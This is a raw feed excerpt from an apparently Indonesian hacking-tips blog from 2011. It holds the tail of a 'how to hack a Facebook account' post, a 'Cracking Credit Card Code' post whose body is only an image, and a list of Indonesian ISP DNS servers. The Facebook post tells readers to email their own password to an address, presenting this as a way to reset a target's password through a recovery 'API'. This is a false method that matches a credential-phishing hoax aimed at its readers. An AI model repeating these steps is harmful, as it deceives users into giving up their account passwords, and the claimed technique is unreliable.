&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Ingat, tidak ada ruang antara 082856831ec22b63f594f61efb8d5d5e tanda plus dan alamat email Anda. Password akan dikirimkan ke alamat email ini, jadi pastikan Anda mengetik alamat email Anda benar. Lihatlah tanda] [setelah, ruang saya tidak! itu berarti array.&lt;/div&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;DIBUAT DENGAN 80%&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;4. Otentikasi: (i sebut ini NYERI DI ASS THA):&lt;a href="http://w0tt.wordpress.com/2011/06/23/cara-hack-account-fb-2011/hack3/" rel="attachment wp-att-93" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-blfbFAJ6NxU/Ti--J1bHwsI/AAAAAAAABBw/Dz8cpop8JUc/s1600/hack3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-blfbFAJ6NxU/Ti--J1bHwsI/AAAAAAAABBw/Dz8cpop8JUc/s320/hack3.png" width="287" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Hacking tidak pernah mudah, tetapi selalu dapat mengelabui.&lt;br /&gt;
Hal terakhir dan sangat penting adalah otentikasi. Untuk melakukan hal ini adalah sederhana, ketikkan password facebook pada command line. Itulah mengapa Anda harus memiliki account aktif di facebook, untuk membuktikan otentikasi.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Karena password recovery melalui API akan menghasilkan password baru dan akan memeriksa dengan alamat email yang valid yang Anda berikan pada langkah ketiga, pastikan Anda mengetik alamat email Anda pada langkah ketiga dengan benar. Miss alamat email mengetik akan gagal aksi perintah, dalam kata sederhana “menolak perintah”. Tambahkan isi email sebagai berikut:&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;otentikasi: 53d481448deb640b6866b6c124691d3a + password anda&lt;br /&gt;
tindakan: tunggal&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Sama seperti sebelumnya, tidak ada ruang. Jangan semua jenis tindakan, hanya tunggal. Jenis semua untuk tindakan berarti perintah mesin facebook password recovery untuk mereset semua password (kata sandi Anda dan password target Anda).&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;5. Bersihkan Jejak:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-KLqUzxwoYtE/Ti--XBLkMWI/AAAAAAAABB0/zjqljp3oXYs/s1600/hack4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/-KLqUzxwoYtE/Ti--XBLkMWI/AAAAAAAABB0/zjqljp3oXYs/s400/hack4.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3900780076543133178-2714086188857439264?l=sxcode.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=kr77FM4SuXI:leTOr0Nn544:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=kr77FM4SuXI:leTOr0Nn544:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=kr77FM4SuXI:leTOr0Nn544:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=kr77FM4SuXI:leTOr0Nn544:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=kr77FM4SuXI:leTOr0Nn544:YwkR-u9nhCs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=YwkR-u9nhCs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=kr77FM4SuXI:leTOr0Nn544:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=kr77FM4SuXI:leTOr0Nn544:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=kr77FM4SuXI:leTOr0Nn544:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=kr77FM4SuXI:leTOr0Nn544:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=kr77FM4SuXI:leTOr0Nn544:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=kr77FM4SuXI:leTOr0Nn544:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=kr77FM4SuXI:leTOr0Nn544:KwTdNBX3Jqk"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=kr77FM4SuXI:leTOr0Nn544:KwTdNBX3Jqk" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=kr77FM4SuXI:leTOr0Nn544:l6gmwiTKsz0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=l6gmwiTKsz0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=kr77FM4SuXI:leTOr0Nn544:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=kr77FM4SuXI:leTOr0Nn544:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=kr77FM4SuXI:leTOr0Nn544:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityBlog/~4/kr77FM4SuXI" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-27T00:30:39.331-07:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-rH8vovMu5N0/Ti-9xLYZ5EI/AAAAAAAABBo/Lj4RZEhthHQ/s72-c/hack1.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://sxcode.blogspot.com/2011/07/cara-hack-account-fb-2011.html</feedburner:origLink></item><item><title>Cracking Credit Card Code ~ Cara ngitung credit Card CC</title><link>http://feedproxy.google.com/~r/SecurityBlog/~3/PaBnlWN-bIU/cracking-credit-card-code-cara-ngitung.html</link><category>Tips - Triks</category><author>noreply@blogger.com (Bajingan)</author><pubDate>Wed, 27 Jul 2011 00:18:06 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3900780076543133178.post-8417900631268372615</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span class="Apple-style-span" style="font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Cracking Credit Card Code :&amp;nbsp;AMEX, DISCOVER, VISA &amp;amp; MASTERCARD&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-4NNpriJNMTY/Ti-7d0K1x3I/AAAAAAAABBk/SFlLKKPUnok/s1600/139688_700b-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-4NNpriJNMTY/Ti-7d0K1x3I/AAAAAAAABBk/SFlLKKPUnok/s1600/139688_700b-1.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3900780076543133178-8417900631268372615?l=sxcode.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=PaBnlWN-bIU:P5ApVQ2FMEQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=PaBnlWN-bIU:P5ApVQ2FMEQ:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=PaBnlWN-bIU:P5ApVQ2FMEQ:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=PaBnlWN-bIU:P5ApVQ2FMEQ:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=PaBnlWN-bIU:P5ApVQ2FMEQ:YwkR-u9nhCs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=YwkR-u9nhCs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=PaBnlWN-bIU:P5ApVQ2FMEQ:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=PaBnlWN-bIU:P5ApVQ2FMEQ:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=PaBnlWN-bIU:P5ApVQ2FMEQ:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=PaBnlWN-bIU:P5ApVQ2FMEQ:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=PaBnlWN-bIU:P5ApVQ2FMEQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=PaBnlWN-bIU:P5ApVQ2FMEQ:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=PaBnlWN-bIU:P5ApVQ2FMEQ:KwTdNBX3Jqk"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=PaBnlWN-bIU:P5ApVQ2FMEQ:KwTdNBX3Jqk" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=PaBnlWN-bIU:P5ApVQ2FMEQ:l6gmwiTKsz0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=l6gmwiTKsz0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=PaBnlWN-bIU:P5ApVQ2FMEQ:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=PaBnlWN-bIU:P5ApVQ2FMEQ:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=PaBnlWN-bIU:P5ApVQ2FMEQ:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityBlog/~4/PaBnlWN-bIU" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-27T00:18:06.670-07:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-4NNpriJNMTY/Ti-7d0K1x3I/AAAAAAAABBk/SFlLKKPUnok/s72-c/139688_700b-1.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://sxcode.blogspot.com/2011/07/cracking-credit-card-code-cara-ngitung.html</feedburner:origLink></item><item><title>Daftar DNS ISP (Internet Service Provider) Indonesia</title><link>http://feedproxy.google.com/~r/SecurityBlog/~3/tcE0cG_52oY/daftar-dns-isp-internet-service.html</link><category>Tips - Triks</category><author>noreply@blogger.com (Bajingan)</author><pubDate>Wed, 27 Jul 2011 00:15:21 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3900780076543133178.post-7946023085854296321</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span class="Apple-style-span" style="font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Daftar DNS ISP (Internet Service Provider) Indonesia&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Telkom&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;202.134.1.10 (Surabaya)&lt;br /&gt;
202.134.1.7&lt;br /&gt;
202.134.0.155 (Jakarta)&lt;br /&gt;
203.130.196.5 (Jakarta)&lt;br /&gt;
202.134.2.5 (Surabaya)&lt;br /&gt;
203.130.206.250 (Medan)&lt;br /&gt;
203.130.193.74 (Batam)&lt;br /&gt;
203.130.209.242 (Balikpapan)&lt;br /&gt;
222.124.204.34 (Bandung)&lt;br /&gt;
203.130.208.18 (Semarang)&lt;br /&gt;
61.94.192.12 (Denpasar)&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Indosat&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;202.155.0.20&lt;br /&gt;
202.155.0.15&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Centrin&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;202.146.255.3&lt;br /&gt;
202.146.255.5&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;CBN&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;202.158.20.1&lt;br /&gt;
202.158.40.1&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Indonet&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;202.159.32.2&lt;br /&gt;
202.159.33.2&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Pesat&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;202.95.128.180&lt;br /&gt;
202.95.128.60&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Melsa&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;202.138.224.2&lt;br /&gt;
202.138.224.4&lt;br /&gt;
202.138.225.253&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Radnet&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;202.154.1.2&lt;br /&gt;
202.154.3.2&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;ITB&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;167&lt;a href="http://wxyz.web.id/" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #cc0000; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;.&lt;/a&gt;205.22.123&lt;br /&gt;
167.205.30.114&lt;br /&gt;
202.249.24.65&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;OpenDNS&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;208.67.222.222&lt;br /&gt;
